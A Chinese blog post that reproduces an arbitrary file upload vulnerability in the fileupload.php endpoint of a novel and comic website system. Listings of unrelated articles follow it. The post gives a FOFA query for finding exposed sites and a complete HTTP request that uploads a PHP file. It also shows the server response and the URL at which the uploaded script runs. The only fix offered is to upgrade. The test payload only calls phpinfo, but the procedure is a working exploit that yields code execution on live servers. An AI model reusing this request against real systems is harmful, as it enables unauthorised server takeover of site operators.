小说漫画系统 fileupload.php 任意文件上传漏洞复现

ops/2024/10/18 1:27:10/

FOFA搜索语句

"/Public/home/mhjs/jquery.js"

漏洞复现 

1.向靶场发送如下数据包

POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/2
Host: xxx.xxx.xx.xx
Cookie: PHPSESSID=54bc7gac1mgk0l3nm8cv6sek07; uloginid=677742617
Cache-Control: max-age=0
Sec-Ch-Ua: 
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209------WebKitFormBoundaryqvlfcogulumndzorContent-Disposition: form-data; name="file"; filename="fpgemjsu.php"Content-Type: image/jpeg
<?php phpinfo();unlink(__FILE__);?>------WebKitFormBoundaryqvlfcogulumndzor

响应内容如下

HTTP/2 200 OK
Server: nginx
Date: Sun, 13 Oct 2024 08:55:28 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Oct 2024 08:55:28 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Strict-Transport-Security: max-age=31536000{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

 

2.访问回显文件

Public/webuploader/0.1.5/server/upload/fpgemjsu.php

 

修复建议

升级到最新版本。

作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。


http://www.ppmy.cn/ops/126348.html

相关文章

阿里 C++面试,算法题没做出来,,,

阿里 C++面试,算法题没做出来,,,

我本人是非科班学 C 后端和嵌入式的。在我面试的过程中&#xff0c;竟然得到了阿里​ C 研发工程师的面试机会。因为&#xff0c;阿里主要是用 Java 比较多&#xff0c;C 的岗位比较少​&#xff0c;所以感觉这个机会还是挺难得的。 阿里 C 研发工程师面试考了我一道类似于快速…
阅读更多...
android——自定义控件(不停变化的textview、开关switch、动画效果的打勾)

android——自定义控件(不停变化的textview、开关switch、动画效果的打勾)

一、从开始数字到结束数字&#xff0c;不断变化 import android.animation.TypeEvaluator; import android.animation.ValueAnimator; import android.content.Context; import android.util.AttributeSet; import android.view.animation.AccelerateDecelerateInterpolator;i…
阅读更多...
Linux之如何找回 root 密码?

Linux之如何找回 root 密码?

1、启动系统&#xff0c;进入开界面&#xff0c;在界面中按“e"进入编辑界面 2、进入编辑界面&#xff0c;使用键盘上的上下键把光标往下移动&#xff0c;找到以”Linux16“开通内容所在的行数&#xff0c;在行的最后面输入&#xff1a;init/bin/sh 3、输入完成后&…
阅读更多...
【Spring AI】Java实现类似langchain的第三方函数调用_原理与详细示例

【Spring AI】Java实现类似langchain的第三方函数调用_原理与详细示例

Spring AI 介绍 &#xff1a;简化Java AI开发的统一接口解决方案 在过去&#xff0c;使用Java开发AI应用时面临的主要困境是没有统一且标准的封装库&#xff0c;导致开发者需要针对不同的AI服务提供商分别学习和对接各自的API&#xff0c;这增加了开发难度与迁移成本。而Sprin…
阅读更多...
408算法题leetcode--第36天

408算法题leetcode--第36天

96. 不同的二叉搜索树 题目地址&#xff1a;96. 不同的二叉搜索树 - 力扣&#xff08;LeetCode&#xff09; 题解思路&#xff1a;dp 时间复杂度&#xff1a;O(n^2) 空间复杂度&#xff1a;O(n) 代码: class Solution { public:int numTrees(int n) {// dp[]: i个节点的二…
阅读更多...
JavaWeb Servlet--09深入:注册系统03--删除用户业务

JavaWeb Servlet--09深入:注册系统03--删除用户业务

删除用户业务 在显示用户的界面游两个超链接&#xff1a;修改和删除&#xff0c;这里将对删除进行业务实现&#xff1a; 思想&#xff1a;在页面展示信息&#xff0c;点击删除的超链接后&#xff0c;获取id&#xff0c;在controller层进行调用service的业务逻辑处理&#xff…
阅读更多...
【Linux系统编程】环境基础开发工具使用

【Linux系统编程】环境基础开发工具使用

目录 1、Linux软件包管理器yum 1.1 什么是软件包 1.2 安装软件 1.3 查看软件包 1.4 卸载软件 2、Linux编辑器-vim 2.1 vim的概念 2.2 vim的基本操作 2.3 vim的配置 3、Linux编译器-gcc/g 3.1 gcc编译的过程​编辑​编辑​编辑 3.2 详解链接 动态链接 静态链接 4…
阅读更多...
oracle + mybatis 批量新增

oracle + mybatis 批量新增

oracle mybatis 批量新增 mybatis 批量最大1000条&#xff0c;数据多的话&#xff0c;分多次执行批量操作&#xff1a; <dependency><groupId>org.apache.commons</groupId><artifactId>commons-collections4</artifactId><version>4.4&l…
阅读更多...
最新文章

Copyright @ 2022~2023